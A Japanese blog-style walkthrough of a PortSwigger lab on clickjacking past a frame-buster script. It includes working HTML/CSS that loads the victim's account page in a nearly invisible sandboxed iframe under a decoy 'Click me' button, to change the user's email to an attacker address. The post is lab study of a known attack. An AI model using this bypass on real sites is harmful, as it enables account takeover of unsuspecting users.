Hello there, ('ω')ノ
フレームバスタースクリプトを使用したクリックジャッキングを。
このラボは、Webサイトがフレーム化されるのを防ぐ。
フレームバスターによって保護されていて。
フレームバスターを回避するクリックジャッキング攻撃でメールアドレスを変更して。
まずは、ログインして。
メールアドレスの変更を。
メールアドレスを変更をするリクエストを確認して。
ソースコードを確認すると。
Updateボタンで、下記へ遷移するようで。
/my-account/change-email
ただし、メールアドレスを変更するリクエストは下記のとおりで。
クリックジャッキングでUpdateをクリックさせるようにするためのページで。
エクスプロイトサーバーで、下記のHTMLを挿入して。
PortSwiggerのSolutionに書かれているパラメータだとうまくいかないので。
一部を変更して。
<style>
iframe {
position:relative;
width:700px;
height: 600px;
opacity: 0.0001;
z-index: 2;
}
div {
position:absolute;
top:485px;
left:80px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe sandbox="allow-forms"
src="https://ac6b1f1c1ffdc1b380c2389c005200a0.web-security-academy.net/my-account?id=wiener&email=hacker@attacker-website.com"></iframe>
わかりやすくするために透過する数値を変えてみて。
View exploiteで、Click meがUpdateボタンの上になるように位置を調整して。
opacity: 0.4001;
Click meをクリックするといつもの画面遷移が。
あたらめてページを確認するとメールアドレスが変更されているももの。
なぜかクリアできないようで。
ちなみにメール変更のリクエストのメソッドを変更して。
下記のURLを組み込んでエクスプロイトに組み込んでみると。
/my-account/change-email?email=user%40mail.com&csrf=g6ANNnKNwfu7JL9cSRElP5ssgcAbhZ8m
ページが表示されないのでボタンすら押せず。
idパラメータを除いて。
下記のURLを組み込んでエクスプロイトに組み込んで実行してみると。
なぜかクリアできたものの、実際にはメールアドレスは変更されず。
問題に対するサイトの作りに問題があるのではと。
/my-account?email=hacker@attacker-website.com
Best regards, (^^ゞ